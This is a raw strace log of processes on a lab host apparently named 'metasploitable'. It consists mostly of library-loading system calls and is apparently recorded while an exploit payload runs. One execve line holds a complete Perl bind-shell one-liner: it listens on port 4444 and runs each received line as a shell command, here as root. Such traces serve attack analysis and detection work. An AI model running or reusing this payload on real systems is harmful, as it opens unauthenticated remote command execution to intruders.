12577 07:43:07.234436 fstat64(1, {st_mode=S_IFREG|0644, st_size=83708, ...}) = 0

12577 07:43:07.234453 mmap2(NULL, 96232, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7e00000

12577 07:43:07.234464 mmap2(0xb7e14000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7e14000

12577 07:43:07.234479 mmap2(0xb7e16000, 6120, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7e16000

12577 07:43:07.234492 close(1)          = 0

12577 07:43:07.234527 munmap(0xb7fa6000, 29913) = 0

12577 07:43:07.234577 open("/etc/ld.so.cache", O_RDONLY) = 1

12577 07:43:07.234606 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

12577 07:43:07.234635 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7fa6000

12577 07:43:07.234645 close(1)          = 0

12577 07:43:07.234655 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12577 07:43:07.234669 open("/lib/tls/i686/cmov/libnss_nis.so.2", O_RDONLY) = 1

12577 07:43:07.234683 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20\31\0\0004\0\0\0\320\201\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\350x\0\0\350x\0\0\350x\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\310}\0\0\310}\0\0\5\0\0\0\0\20\0\0\1\0\0\0\334~\0\0\334\216\0\0\334\216\0\0\374\1\0\0`\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360~\0\0\360\216\0\0\360\216\0\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334~\0\0\334\216\0\0\334\216\0\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0g\0\0\0000\0\0\0\20\0\0\0\t\0\0\0\2\0\0H  \26\20\0\0@g\3\0\3\6\30\24\0248A\30&\243\301\200\212\0048\21\10 B@\310\24\344\20\311\244\10\0\4\0\0@\0P!\0\0\204\0\0\0\0@\v\0y\243\0D\202\0\0\0\0000\0\0\0001\0\0\0\0\0\0\0002\0\0\0003\0\0\0004\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0005\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0006\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0007\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

12577 07:43:07.234770 fstat64(1, {st_mode=S_IFREG|0644, st_size=34352, ...}) = 0

12577 07:43:07.234787 mmap2(NULL, 37436, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7df6000

12577 07:43:07.234798 mmap2(0xb7dfe000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x7) = 0xb7dfe000

12577 07:43:07.234814 close(1)          = 0

12577 07:43:07.234826 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12577 07:43:07.234839 open("/lib/tls/i686/cmov/libnss_files.so.2", O_RDONLY) = 1

12577 07:43:07.234856 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\340\30\0\0004\0\0\0\254\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\330\206\0\0\330\206\0\0\330\206\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\240\213\0\0\240\213\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0\314\1\0\0\260\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0k\0\0\0.\0\0\0\20\0\0\0\t\0\0\0\"F\340\24\240\240\245\1\31\10\200\20\203\6\212\10\0\0\222@]\1(\nx\10 \"\220\200\20,\5\1\204\4)!\0224\0\24\0\31\0\0\2\2\210@\0\200@0\210\201@@\200\0B\0\6\300.\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0002\0\0\0003\0\0\0\0\0\0\0004\0\0\0\0\0\0\0005\0\0\0007\0\0\0008\0\0\0\0\0\0\0:\0\0\0\0\0\0\0;\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

12577 07:43:07.234942 fstat64(1, {st_mode=S_IFREG|0644, st_size=38412, ...}) = 0

12577 07:43:07.234959 mmap2(NULL, 41624, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7deb000

12577 07:43:07.234970 mmap2(0xb7df4000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7df4000

12577 07:43:07.234985 close(1)          = 0

12577 07:43:07.235005 munmap(0xb7fa6000, 29913) = 0

12577 07:43:07.235058 open("/etc/passwd", O_RDONLY|0x80000 /* O_??? */) = 1

12577 07:43:07.235087 fcntl64(1, F_GETFD) = 0x1 (flags FD_CLOEXEC)

12577 07:43:07.235099 _llseek(1, 0, [0], SEEK_CUR) = 0

12577 07:43:07.235111 fstat64(1, {st_mode=S_IFREG|0644, st_size=1624, ...}) = 0

12577 07:43:07.235127 mmap2(NULL, 1624, PROT_READ, MAP_SHARED, 1, 0) = 0xb7fad000

12577 07:43:07.235138 _llseek(1, 1624, [1624], SEEK_SET) = 0

12577 07:43:07.235152 munmap(0xb7fad000, 1624) = 0

12577 07:43:07.235175 close(1)          = 0

12577 07:43:07.235205 getpgrp()         = 3831

12577 07:43:07.235215 rt_sigaction(SIGCHLD, {0x807e540, [], 0}, {SIG_DFL}, 8) = 0

12577 07:43:07.235230 getrlimit(RLIMIT_NPROC, {rlim_cur=8191, rlim_max=8191}) = 0

12577 07:43:07.235245 brk(0x8101000)    = 0x8101000

12577 07:43:07.235275 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

12577 07:43:07.235289 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

12577 07:43:07.235303 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

12577 07:43:07.235339 brk(0x8102000)    = 0x8102000

12577 07:43:07.235364 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

12577 07:43:07.235383 stat64("/sbin/AB", 0xbf8ab708) = -1 ENOENT (No such file or directory)

12577 07:43:07.235395 stat64("/bin/AB", 0xbf8ab708) = -1 ENOENT (No such file or directory)

12577 07:43:07.235405 stat64("/usr/sbin/AB", 0xbf8ab708) = -1 ENOENT (No such file or directory)

12577 07:43:07.235417 stat64("/usr/bin/AB", 0xbf8ab708) = -1 ENOENT (No such file or directory)

12577 07:43:07.235429 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

12577 07:43:07.235443 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7e216f8) = 12578

12578 07:43:07.235486 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

12578 07:43:07.235501 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

12578 07:43:07.235524 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

12578 07:43:07.235567 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

12578 07:43:07.235597 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

12578 07:43:07.235613 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

12578 07:43:07.235627 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

12578 07:43:07.235695 write(2, "sh: AB: command not found\n", 26) = -1 EPIPE (Broken pipe)

12578 07:43:07.235709 --- SIGPIPE (Broken pipe) @ 0 (0) ---

12578 07:43:07.235774 exit_group(127)   = ?

12577 07:43:07.261276 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

12577 07:43:07.261276 --- SIGCHLD (Child exited) @ 0 (0) ---

12577 07:43:07.261286 waitpid(-1,  <unfinished ...>

4519  07:43:07.261299 waitpid(12577,  <unfinished ...>

12577 07:43:07.261320 <... waitpid resumed> [{WIFEXITED(s) && WEXITSTATUS(s) == 127}], WNOHANG) = 12578

12577 07:43:07.271500 waitpid(-1, 0xbf8ab388, WNOHANG) = -1 ECHILD (No child processes)

12577 07:43:07.271501 sigreturn()       = ? (mask now [])

12577 07:43:07.271501 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

12577 07:43:07.271501 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

12577 07:43:07.271501 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

12577 07:43:07.271502 rt_sigaction(SIGINT, {0x807f150, [], 0}, {SIG_DFL}, 8) = 0

12577 07:43:07.271502 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

12577 07:43:07.271502 rt_sigaction(SIGINT, {SIG_DFL}, {0x807f150, [], 0}, 8) = 0

12577 07:43:07.271502 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

12577 07:43:07.271502 stat64("/sbin/perl", 0xbf8ab738) = -1 ENOENT (No such file or directory)

12577 07:43:07.271503 stat64("/bin/perl", 0xbf8ab738) = -1 ENOENT (No such file or directory)

12577 07:43:07.271513 stat64("/usr/sbin/perl", 0xbf8ab738) = -1 ENOENT (No such file or directory)

12577 07:43:07.271525 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

12577 07:43:07.271543 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

12577 07:43:07.271567 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

12577 07:43:07.271581 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7e216f8) = 12579

12579 07:43:07.271636 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

12579 07:43:07.272293 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

12579 07:43:07.272366 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

12579 07:43:07.272408 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

12579 07:43:07.272434 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

12579 07:43:07.272454 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

12579 07:43:07.272467 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

12579 07:43:07.272500 execve("/usr/bin/perl", ["perl", "-MIO", "-e", "$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};"], [/* 14 vars */]) = 0

12579 07:43:07.272584 brk(0)            = 0x8153000

12579 07:43:07.272603 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12579 07:43:07.272618 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f3c000

12579 07:43:07.272633 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

12579 07:43:07.272649 open("/etc/ld.so.cache", O_RDONLY) = 1

12579 07:43:07.272661 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

12579 07:43:07.272678 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f34000

12579 07:43:07.272688 close(1)          = 0

12579 07:43:07.272698 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12579 07:43:07.272713 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

12579 07:43:07.272727 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

12579 07:43:07.272862 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

12579 07:43:07.272897 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f30000

12579 07:43:07.272923 mmap2(0xb7f32000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7f32000

12579 07:43:07.272939 close(1)          = 0

12579 07:43:07.272950 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12579 07:43:07.272964 open("/lib/tls/i686/cmov/libm.so.6", O_RDONLY) = 1

12579 07:43:07.272978 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@4\0\0004\0\0\0PB\2\0\0\0\0\0004\0 \0\t\0(\0 \0\37\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0x\20\2\0x\20\2\0x\20\2\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0$/\2\0$/\2\0\5\0\0\0\0\20\0\0\1\0\0\0\334>\2\0\334>\2\0\334>\2\0`\1\0\0\244\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360>\2\0\360>\2\0\360>\2\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\214\20\2\0\214\20\2\0\214\20\2\0\34\4\0\0\34\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334>\2\0\334>\2\0\334>\2\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\214\2\0\0\17\0\0\0@\0\0\0\v\0\0\0%\220 \305\t\204g\v\0\302\20 \4iER\202\20\200\240\0}\210\272\10\10I\0\0\0\0\0\33\4\201\0\0\0\232U\20A P \200\224\202\220\21@\3722\0\304a\24\0\10\6\306\220\232\f\207\300 \250\0  \202\0\230\201\4E\7\0054a\2\0\0\251C\30\310 \10\23\30\24M8\"\0\22\24\21@T\203\2E\1\1\1\244\fX\20\0\210\2\0 \0@\0$\214\5\10", 512) = 512

12579 07:43:07.273063 fstat64(1, {st_mode=S_IFREG|0644, st_size=149328, ...}) = 0

12579 07:43:07.273080 mmap2(NULL, 147584, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f0b000

12579 07:43:07.273091 mmap2(0xb7f2e000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x23) = 0xb7f2e000

12579 07:43:07.273106 close(1)          = 0

12579 07:43:07.273117 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12579 07:43:07.273131 open("/lib/tls/i686/cmov/libpthread.so.0", O_RDONLY) = 1

12579 07:43:07.273145 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20H\0\0004\0\0\0\330C\1\0\0\0\0\0004\0 \0\t\0(\0$\0!\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\224\n\1\0\224\n\1\0\224\n\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\4;\1\0\4;\1\0\5\0\0\0\0\20\0\0\1\0\0\0\344=\1\0\344M\1\0\344M\1\0T\3\0\0\374#\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\250\n\1\0\250\n\1\0\250\n\1\0\314\4\0\0\314\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\344=\1\0\344M\1\0\344M\1\0\20\2\0\0\20\2\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\262\1\0\0L\0\0\0@\0\0\0\v\0\0\0\31!\2\221\1\n\20\"@H \331\3\0I4\200\0\0@\0 \200\200\21P`@@\22\213\0020D\0\0\20\0\0\2\0\1\r\0\204\n\360\1X\260\r\240\200\10 $\204\20B\242)m\10G\234V\20\0\224 \204$\10\0H(\1\222\34\301B\240\220\22\10\f \2\30`A\244c\4\0\n\32\3\0\0)\0(\314@\204\210L\22\10\241\0\4\0\10\0\300Q\0\2009\4C\300", 512) = 512

12579 07:43:07.273229 fstat64(1, {st_mode=S_IFREG|0755, st_size=112354, ...}) = 0

12579 07:43:07.273245 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f0a000

12579 07:43:07.273258 mmap2(NULL, 94688, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7ef2000

12579 07:43:07.273268 mmap2(0xb7f06000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7f06000

12579 07:43:07.273282 mmap2(0xb7f08000, 4576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f08000

12579 07:43:07.273298 close(1)          = 0

12579 07:43:07.273319 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12579 07:43:07.273373 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

12579 07:43:07.273388 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

12579 07:43:07.273489 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

12579 07:43:07.273508 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7da3000

12579 07:43:07.273519 mmap2(0xb7eec000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7eec000

12579 07:43:07.273533 mmap2(0xb7eef000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7eef000

12579 07:43:07.273546 close(1)          = 0

12579 07:43:07.273557 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12579 07:43:07.273570 open("/lib/tls/i686/cmov/libcrypt.so.1", O_RDONLY) = 1

12579 07:43:07.273584 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0000\7\0\0004\0\0\0<\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340\210\0\0\340\210\0\0\340\210\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\f\212\0\0\f\212\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0`\1\0\0tr\2\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\17\0\0\0\22\0\0\0\2\0\0\0\6\0\0\0\4\311\240, \4\0\0\0\0\0\0\0\0\0\0\0\0\0\0\22\0\0\0\23\0\0\0\24\0\0\0\0\0\0\0\25\0\0\0\26\0\0\0\0\0\0\0\27\0\0\0\0\0\0\0\30\0\0\0\31\0\0\0\0\0\0\0k\31Qj\233(\375B\233`\205\33\327\16?\17I->\333\235C\r\375\313\373_\22\325=l\366\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0o\0\0\0\0\0\0\0\35\0\0\0\22\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\37\0\0\0\0\0\0\0", 512) = 512

12579 07:43:07.273671 fstat64(1, {st_mode=S_IFREG|0644, st_size=38300, ...}) = 0

12579 07:43:07.273687 mmap2(NULL, 201052, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d71000

12579 07:43:07.273697 mmap2(0xb7d7a000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7d7a000

12579 07:43:07.273711 mmap2(0xb7d7c000, 155996, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7d7c000

12579 07:43:07.273724 close(1)          = 0

12579 07:43:07.273748 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7d70000

12579 07:43:07.273760 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7d708c0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

12579 07:43:07.273872 mprotect(0xb7eec000, 4096, PROT_READ) = 0

12579 07:43:07.273900 munmap(0xb7f34000, 29913) = 0

12579 07:43:07.273913 set_tid_address(0xb7d70908) = 12579

12579 07:43:07.273922 set_robust_list(0xb7d70910, 0xc) = 0

12579 07:43:07.273932 futex(0xbfe2ead0, 0x81 /* FUTEX_??? */, 1) = 0

12579 07:43:07.273945 rt_sigaction(SIGRTMIN, {0xb7ef62c0, [], SA_SIGINFO}, NULL, 8) = 0

12579 07:43:07.273972 rt_sigaction(SIGRT_1, {0xb7ef6340, [], SA_RESTART|SA_SIGINFO}, NULL, 8) = 0

12579 07:43:07.273984 rt_sigprocmask(SIG_UNBLOCK, [RTMIN RT_1], NULL, 8) = 0

12579 07:43:07.273997 getrlimit(RLIMIT_STACK, {rlim_cur=8192*1024, rlim_max=RLIM_INFINITY}) = 0

12579 07:43:07.274015 uname({sys="Linux", node="metasploitable", ...}) = 0

12579 07:43:07.274060 rt_sigaction(SIGFPE, {SIG_IGN}, {SIG_DFL}, 8) = 0

12579 07:43:07.274104 brk(0)            = 0x8153000

12579 07:43:07.274114 brk(0x8174000)    = 0x8174000

12579 07:43:07.274155 getuid32()        = 0

12579 07:43:07.274165 geteuid32()       = 0

12579 07:43:07.274173 getgid32()        = 0

12579 07:43:07.274182 getegid32()       = 0

12579 07:43:07.274218 mmap2(NULL, 135168, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7d4f000

12579 07:43:07.274243 open("/dev/urandom", O_RDONLY|O_LARGEFILE) = 1

12579 07:43:07.274259 read(1, "\216\325\27\331", 4) = 4

12579 07:43:07.274272 close(1)          = 0

12579 07:43:07.274290 time(NULL)        = 1495626187

12579 07:43:07.274389 stat64("/usr/local/lib/site_perl/5.8.8/i486-linux-gnu-thread-multi", 0xbfe2e7a0) = -1 ENOENT (No such file or directory)

